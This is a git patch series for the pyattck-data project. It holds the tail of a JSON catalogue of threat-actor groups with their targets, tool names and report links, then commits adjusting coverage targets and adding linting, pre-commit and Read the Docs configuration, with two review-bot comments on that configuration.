null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Ghoul" + ], + "targets": [ + "mainly industrial, engineering and manufacturing organizations in more than 30 countries" + ], + "operations": [ + "Operation Ghoul" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ], + "attck_id": null, + "comment": "Financial interests" + }, + { + "country": "unknown", + "names": [ + "FruityArmor" + ], + "targets": [ + "Middle Eastern region" + ], + "operations": [], + "description": null, + "tools": [ + "PowerShell backdoor", + "CVE-2018-8611", + "0day CVE-2018-8453", + "MS16-120 / CVE-2016-3393 0day exploits" + ], + "links": [ + "https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", + 
"https://securelist.com/blog/research/76396/windows-zero-day-exploit-used-in-targeted-attacks-by-fruityarmor-apt/", + "https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Snake Wine" + ], + "targets": [ + "Japanese Targets" + ], + "operations": [], + "description": null, + "tools": [ + "Ham Backdoor", + "Tofu Backdoor" + ], + "links": [ + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html" + ], + "attck_id": null, + "comment": "Tracked by Cylance" + }, + { + "country": "unknown", + "names": [ + "Manganese", + "APT5" + ], + "targets": [ + "Telecommunications and technology companies, particularly in Southeast Asia, as well as high-tech manufacturing firms and military application technology" + ], + "operations": [], + "description": null, + "tools": [ + "Leouncia" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://twitter.com/bkMSFT/status/1164881831830929411", + "https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Sowbug" + ], + "targets": [ + "South American and Southeast Asian governments" + ], + "operations": [], + "description": null, + "tools": [ + "Felismus" + ], + "links": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ], + "attck_id": null, + "comment": "Tracked by Symantec" + }, + { + "country": "unknown", + "names": [ + "Triton", + "TRISIS" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + 
"https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "?" + ], + "targets": [ + "Winter Olympics in Pyeongchang, South Korea; adversaries looking for information from the games but instead they are aimed to disrupt the games" + ], + "operations": [ + "Olympic Destroyer" + ], + "description": null, + "tools": [ + "Olympic Destroyer (destructive malware)", + "PsExec" + ], + "links": [ + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", + "http://www.intezer.com/2018-winter-cyber-olympics-code-similarities-cyber-attacks-pyeongchang/", + "https://www.recordedfuture.com/olympic-destroyer-malware/", + "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", + "https://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html" + ], + "attck_id": null, + "comment": "Probably Sandworm Team. 
Highly sophisticated false flag" + }, + { + "country": "unknown", + "names": [ + "Orangeworm" + ], + "targets": [ + "Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage" + ], + "operations": [], + "description": null, + "tools": [ + "Kwampirs backdoor" + ], + "links": [ + "https://www.databreaches.net/team-orangeworm-claims-to-be-dumping-carepartners-data-from-2018-breach/", + "https://www.databreaches.net/team_orangeworm-issues-new-threats-to-carepartners/", + "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://lab52.io/blog/orangeworm-group-kwampirs-analysis-update/", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ], + "attck_id": null, + "comment": "Possibly FIN10 Tracked by Symantec cybercriminal" + }, + { + "country": "unknown", + "names": [ + "FIN10" + ], + "targets": [ + "Casinos and mining (natural resources)" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf" + ], + "attck_id": null, + "comment": "cybercriminal" + }, + { + "country": "unknown", + "names": [ + "Phantom of Routers", + "BlackTech", + "Palmerworm", + "G0098" + ], + "targets": [ + "targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong" + ], + "operations": [ + "Shrouded Crossbow", + "PLEAD", + "Waterbear" + ], + "description": null, + "tools": [ + "BendyBear" + ], + "links": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", + 
"https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection/", + "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/", + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html" + ], + "attck_id": null, + "comment": "Probably Chinese actor, \"PLEAD\" and Waterbear labels apply to: (1) actors, (2) malware and (3) operations" + }, + { + "country": "unknown", + "names": [ + "White Company" + ], + "targets": [ + "Pakistani government and military \u00e2\u0080\u0094 in particular, the Pakistani Air Force" + ], + "operations": [ + "Shaheen" + ], + "description": null, + "tools": [], + "links": [ + "https://threatvector.cylance.com/en_us/home/the-white-company-inside-the-operation-shaheen-espionage-campaign.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Silence Group" + ], + "targets": [ + "Targets are located in Eastern Europe and Russia" + ], + "operations": [], + "description": null, + "tools": [ + "Truebot", + "Malicious CHM files" + ], + "links": [ + "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf", + "https://www.group-ib.com/media/silence/", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://www.group-ib.com/media/silence_ta505_attacks_in_europe/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Whitefly" + ], + "targets": [ + "Healthcare, media, telecommunications, and 
engineering sectors. Singapore" + ], + "operations": [ + "SingHealth" + ], + "description": null, + "tools": [ + "Mimikatz", + "Vcrodat", + "Nibatad", + "CVE-2016-0051", + "Termite" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore" + ], + "attck_id": null, + "comment": "Has been seen targeting organisations based in Singaport and additionally some multinational organizations with a presence in Singapore." + }, + { + "country": "unknown", + "names": [ + "Shaoye", + "Roaming Mantis" + ], + "targets": [ + "Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam" + ], + "operations": [], + "description": null, + "tools": [ + "MITRE: S0509", + "malicious APK" + ], + "links": [ + "https://www.cybereason.com/blog/research/fakespy-masquerades-as-postal-service-apps-around-the-world", + "https://securelist.com/roaming-mantis-part-iv/90332/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/", + "https://securelist.com/roaming-mantis-part-3/88071/", + "https://securelist.com/it-threat-evolution-q2-2019/91994/", + "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", + "https://securelist.com/roaming-mantis-reaches-europe/105596/", + "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/", + "https://securelist.com/roaming-mantis-part-v/96250/" + ], + "attck_id": null, + "comment": "July 2020 Cybereason assessed it is a Chinese TA" + }, + { + "country": "unknown", + "names": [ + "Siamesekitten", + "HEXANE", + "LYCEUM" + ], + "targets": [ + "Middle East, Kuwait, South Africa" + ], + "operations": [], + "description": null, + "tools": [ + "PowerShell", + "Invoke-Obfuscation", + "DanBot", + "PoshC2", + "DanDrop" + ], + "links": [ + 
"https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", + "https://dragos.com/resource/hexane/" + ], + "attck_id": null, + "comment": "Most likely Iranian group" + }, + { + "country": "unknown", + "names": [ + "Papa Bear", + "APT-C-37" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://mp.weixin.qq.com/s/lUtXwWjPVMHXfR6oLnXYhQ", + "https://zhuanlan.kanxue.com/article-8168.htm", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Saber Lion", + "APT-C-38", + "ZooPark" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blogs.360.cn/post/analysis-of-APT-C-38.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Storm Cloud" + ], + "targets": [ + "Tibetan Community" + ], + "operations": [], + "description": null, + "tools": [ + "GOSLU", + "PLUGDAT", + "BRAINDAMAGE", + "STITCH" + ], + "links": [ + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" + ], + "attck_id": null, + "comment": "Likely a Chinese group" + }, + { + "country": "unknown", + "names": [ + "Chimera" + ], + "targets": [ + "Taiwan semiconductors" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "MagicScroll", + "AcidBox" + ], + "targets": [], + 
"operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.epicturla.com/blog/acidbox-clustering", + "https://unit42.paloaltonetworks.com/acidbox-rare-malware/", + "https://securelist.com/apt-trends-report-q2-2020/97937/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "FIN12" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "White Tur" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html" + ], + "attck_id": null, + "comment": null + } + ] +} \ No newline at end of file From f707663e19e6d96db2cfc1bd51039902a67ce79a Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 9 Jun 2022 14:56:28 -0500 Subject: [PATCH 3/4] feat: Updating version and codecov percentage --- codecov.yml | 4 ++-- pyproject.toml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/codecov.yml b/codecov.yml index bf5a91b..d4bab38 100644 --- a/codecov.yml +++ b/codecov.yml @@ -3,7 +3,7 @@ coverage: status: project: default: - target: "65" + target: "45" patch: default: - target: "65" + target: "45" diff --git a/pyproject.toml b/pyproject.toml index a1eae06..69e818f 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "pyattck-data" -version = "2.0.1" +version = "2.0.0" description = "Pyattck Data" authors = ["Swimlane "] license = "MIT" From 35906cf0a8aa335467cb4b97909941321b79502a Mon Sep 17 00:00:00 2001 
From: MSAdministrator
Date: Thu, 9 Jun 2022 16:05:18 -0500
Subject: [PATCH 4/4] dev: Updating dev dot files!

---
 .coveragerc | 2 ++
 .darglint | 2 ++
 .flake8 | 9 +++++++
 .gitattributes | 1 +
 .pre-commit-config.yaml | 58 +++++++++++++++++++++++++++++++++++++++++
 .readthedocs.yml | 12 +++++++++
 6 files changed, 84 insertions(+)
 create mode 100644 .coveragerc
 create mode 100644 .darglint
 create mode 100644 .flake8
 create mode 100644 .gitattributes
 create mode 100644 .pre-commit-config.yaml
 create mode 100644 .readthedocs.yml

diff --git a/.coveragerc b/.coveragerc
new file mode 100644
index 0000000..ac3e381
--- /dev/null
+++ b/.coveragerc
@@ -0,0 +1,2 @@
+[report]
+fail_under = 45
\ No newline at end of file
diff --git a/.darglint b/.darglint
new file mode 100644
index 0000000..72ccc6c
--- /dev/null
+++ b/.darglint
@@ -0,0 +1,2 @@
+[darglint]
+strictness = long
diff --git a/.flake8 b/.flake8
new file mode 100644
index 0000000..a2b5078
--- /dev/null
+++ b/.flake8
@@ -0,0 +1,9 @@
+[flake8]
+select = B,B9,C,D,DAR,E,F,N,RST,S,W
+ignore = E203,E501,RST201,RST203,RST301,W503
+max-line-length = 120
+max-complexity = 10
+docstring-convention = google
+per-file-ignores = tests/*:S101
+rst-roles = class,const,func,meth,mod,ref
+rst-directives = deprecated
diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..6313b56
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1 @@
+* text=auto eol=lf
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
new file mode 100644
index 0000000..f054639
--- /dev/null
+++ b/.pre-commit-config.yaml
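Review bot: In the new `.flake8`, `ignore` lists E501 while `max-line-length = 120` is still set, so the line-length limit is enforced only by B950 from the selected B9 set, which fires at roughly 10% over the configured value rather than at 120; that intent is invisible in the file. A comment above the `ignore` line, `# E501 is off on purpose: B950 (via B9) enforces max-line-length + 10% instead`, would document it. B9/B950 and the S rules also assume the bugbear and bandit flake8 plugins are installed next to flake8; I cannot see the dev dependencies from this hunk, so worth confirming they are declared.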
@@ -0,0 +1,58 @@
+repos:
+ - repo: local
+ hooks:
+ - id: black
+ name: black
+ entry: black
+ language: system
+ types: [python]
+ require_serial: true
+ - id: check-added-large-files
+ name: Check for added large files
+ entry: check-added-large-files
+ language: system
+ - id: check-toml
+ name: Check Toml
+ entry: check-toml
+ language: system
+ types: [toml]
+ - id: check-yaml
+ name: Check Yaml
+ entry: check-yaml
+ language: system
+ types: [yaml]
+ - id: end-of-file-fixer
+ name: Fix End of Files
+ entry: end-of-file-fixer
+ language: system
+ types: [text]
+ stages: [commit, push, manual]
+ - id: flake8
+ name: flake8
+ entry: flake8
+ language: system
+ types: [python]
+ require_serial: true
+ - id: pyupgrade
+ name: pyupgrade
+ description: Automatically upgrade syntax for newer versions.
+ entry: pyupgrade
+ language: system
+ types: [python]
+ args: [--py37-plus]
+ - id: reorder-python-imports
+ name: Reorder python imports
+ entry: reorder-python-imports
+ language: system
+ types: [python]
+ args: [--application-directories=src]
+ - id: trailing-whitespace
+ name: Trim Trailing Whitespace
+ entry: trailing-whitespace-fixer
+ language: system
+ types: [text]
+ stages: [commit, push, manual]
+ - repo: https://github.com/pre-commit/mirrors-prettier
+ rev: v2.4.1
+ hooks:
+ - id: prettier
diff --git a/.readthedocs.yml b/.readthedocs.yml
new file mode 100644
index 0000000..66f2a21
--- /dev/null
+++ b/.readthedocs.yml
@@ -0,0 +1,12 @@
+version: 2
+build:
+ os: ubuntu-20.04
+ tools:
+ python: "3.10"
+sphinx:
+ configuration: docs/conf.py
+formats: all
+python:
+ install:
+ - requirements: docs/requirements.txt
+ - path: .
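Review bot: The only remote hook, `repo: https://github.com/pre-commit/mirrors-prettier`, is pinned with `rev: v2.4.1`, a tag that the upstream repository can move, so what runs on every developer's commit is not fixed by this file. Pin it to the tag's commit instead, `rev: <full commit SHA of v2.4.1>  # frozen: v2.4.1`, which is the form `pre-commit autoupdate --freeze` writes and keeps the human-readable version in the comment. Every other hook is `repo: local` with `language: system`, so black, flake8, pyupgrade, reorder-python-imports and the pre-commit-hooks scripts must already be on PATH; a short comment above `repos:` stating where they are expected to come from (presumably the project's dev dependencies, which this hunk does not show) would spare new contributors a confusing "executable not found" on first commit.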